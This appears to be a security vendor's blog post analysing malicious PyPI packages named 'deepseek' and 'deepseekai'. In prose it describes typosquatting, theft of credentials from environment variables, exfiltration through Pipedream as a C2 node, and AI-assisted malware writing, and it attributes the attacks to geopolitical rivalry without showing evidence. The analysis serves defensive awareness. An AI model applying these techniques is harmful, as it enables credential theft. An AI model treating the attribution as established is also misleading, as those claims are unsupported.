Background
With the widespread application of AI technology, software supply chains are facing more complex and diverse security threats. Since January 2025, DeepSeek, as an emerging force in China’s AI industry, has suffered from series of cyberattacks. According to the analysis by NSFOCUS Security Lab, most attacks are from IP addresses in the United States. Recently, the DeepSeek malicious software package incident on PyPI has brought the software supply chain security issue into focus again.
This post will deeply analyze the relationship between DeepSeek attacks and software supply chain security, discuss the attack methods, potential risks and competitions between countries, and propose comprehensive countermeasures.
Software Supply Chain Attack Methods in DeepSeek Malware Package Incidents
The recent DeepSeek malware package incident on Python’s official third-party repository Python Package Index (PyPI) is a typical example of software supply chain attacks. Through careful planning, attackers successfully implanted malicious codes into the target environment.
Counterfeit project name: The attacker uploads malware packages named “deepseek” and “deepseekai” on PyPI to counterfeit the well-known AI project DeepSeek by spelling variants of the names. This counterfeiting method is very easy to mislead developers to download and use, so that malicious software packages can enter the software supply chain.
Sensitive data stealing: Once the malicious software package is executed, sensitive data in system environment variables will be extracted, such as cloud service API keys, database access credentials and SSH keys. This sensitive information is crucial to the security of enterprise infrastructure. Once leaked, attackers can directly access and control the enterprise’s infrastructure illegally.
Data return and concealment: Attackers use the cloud integration platform Pipedream as a command and control (C2) node to realize concealment and automatic return of stolen data. At the same time, an interface for loading remote malicious modules is reserved in the malicious code to prepare for lateral penetration. The attacker can further expand the attack scope through this interface.
Development of malicious code with the help of AI tools: A large number of detailed function description comments appear in the malicious code, such as detailed explanations of data encryption logic and environment variable traversal methods. These annotation styles are highly similar to the codes generated by AI programming assistants, indicating that attackers may use AI tools to quickly build malicious payloads and generate malicious code more efficiently.
Abnormal account behavior: The PyPI account bvk that uploads malicious packets has been inactive for a long time since it was registered in June 2023, and suddenly became active before the attack. This mode of “low-credit accounts posting high-profile packets” is a typical feature of supply chain attacks. Many developers rushing to integrate with DeepSeek often neglect the review of account history, allowing such malicious packages to take advantage.
Security Threats and Risks of Software Supply Chain
The DeepSeek malware package incident is just the tip of the iceberg in terms of software supply chain security, and there are actually more potential threats and risks.
The trust crisis in the open source ecosystem continues: Open source repositories such as PyPI and npm are like infrastructure for software development, but their openness leads to an increasing number of malicious packages. According to Sonatype statistics, the number of PyPI malicious packages will increase by 315% year-on-year in 2023. Typosquatting and Dependency Confusion are mainstream attack techniques. In this case, deepseek and deepseekai misleading developers through name spelling variants is a typical Typosquatting.
Attack surface expansion and chain effect: Once malicious software packages enter the software supply chain, they will spread quickly like viruses. Starting from individual developers, malicious packages may be introduced into the local environment due to unverified dependency sources; If this malicious package passes the enterprise’s test and enters the production environment, it may lead to the leakage of enterprise core data; When infected software is distributed to downstream users, the attack surface expands exponentially.
Upgrade of AI-driven attack technology: With the development of AI technology, attackers begin to use AI to improve malware development efficiency and attack accuracy. In case of DeepSeek attacks, attackers quickly build malicious payloads with the help of AI tools. In the future, attackers may use more sophisticated AI algorithms to find weak links in the software supply chain and create more covert and difficult-to-detect malicious software packages. This will make the methods of attacks faced by the software supply chain more complex and diverse, and traditional security protection measures may become overwhelmed.
Risks caused by complex supply chain: From code development, open source component integration, testing, deployment to O&M, vulnerabilities may exist in each part. The developer of an open source component may inadvertently leave a security vulnerability, which can be exploited by attackers after being integrated into the enterprise’s software. As there are many links, it is difficult to quickly locate and solve problems once they occur, which undoubtedly increases the difficulty of safety management.
Use ATT&CK Framework to Deduce the Attack Events
The security threats and risks of the software supply chain mentioned above have an impact that cannot be ignored, no matter for enterprises or countries. For enterprises, core data leakage may lead to theft of trade secrets, damage to their reputation, huge economic losses or even bankruptcy. At the national level, attacks on many enterprises may affect the overall competitiveness of a country, especially in emerging technologies such as AI. It is necessary to start from the ATT&CK framework and conduct an in-depth analysis of the strategy, tactics, and technology behind the DeepSeek attack event to better cope with software supply chain security challenges.
Strategic level: In the current international competition landscape, AI has become a strategic highland for countries to compete. The success of DeepSeek may change the distribution of global market share in AI industry and impact the interests of relevant enterprises. Attacking open source projects such as DeepSeek will be a means to undermine China’s technological rise and pricing power in AI field.
Tactical level: Attackers use a variety of software supply chain attack methods, forming a set of combined techniques. They fake project names to attract developers’ attention, steal data to obtain valuable information, and improve the efficiency of malicious code development with AI tools. These means attack the target from different prospects, and gradually break through the defense line of software supply chain to achieve its attack goal.
Technical level: Attackers take advantage of the trust mechanism of open source ecology and the complexity of software supply chain, carefully design malicious software packages to make them look like normal open source components, and bypass security checks by exploiting developers’ trust in open source projects. At the same time, by using Pipedream as a covert data return mode of C2 node to secretly send out stolen data, and reserving interfaces in the code for long-term latency, DeepSeek and its related ecosystem are continuously damaged.
Process level: Attackers are turning three major features of the AI development process into weapons, including strong dependence on open-source components (80% of AI projects rely on third-party libraries), high complexity of computing environment (hybrid cloud + containerized deployment), and long data flow paths (from labeling to training to reasoning). This makes traditional application security solutions face serious threats in AI supply chain scenarios.
This attack reflects the intense competition in cyberspace. Countries suppress enterprises of other countries through cyber attacks and other means to maintain their own advantages in AI technology, economic interests and international competitiveness. This situation not only affects the development of enterprises in various countries, but also has a far-reaching impact on the security pattern of global software supply chain.
Summary
Without a credible software supply chain, there will be no reliable new productivity.
In the new era when AI defines productivity, software supply chain security has become a national security proposition from a technical issue. Enterprises, industries and countries need to work together to build a comprehensive security governance system.
References
[1] NSFOCUS Fuying Lab. (2025). The Undercurrent Behind the Rise of DeepSeek: DDoS Attacks in the Global AI Technology Game
[2] Saltzer, J. H., & Schroeder, M. D. (1975). The protection of information in computer systems. Proceedings of the IEEE.
[3] NIST. (2022). SP 800-161r1 Cybersecurity Supply Chain Risk Management Practices for Systems and Organizations.
[4] MITRE Corporation. (2023). MITRE ATT&CK Framework for Enterprise Environments.
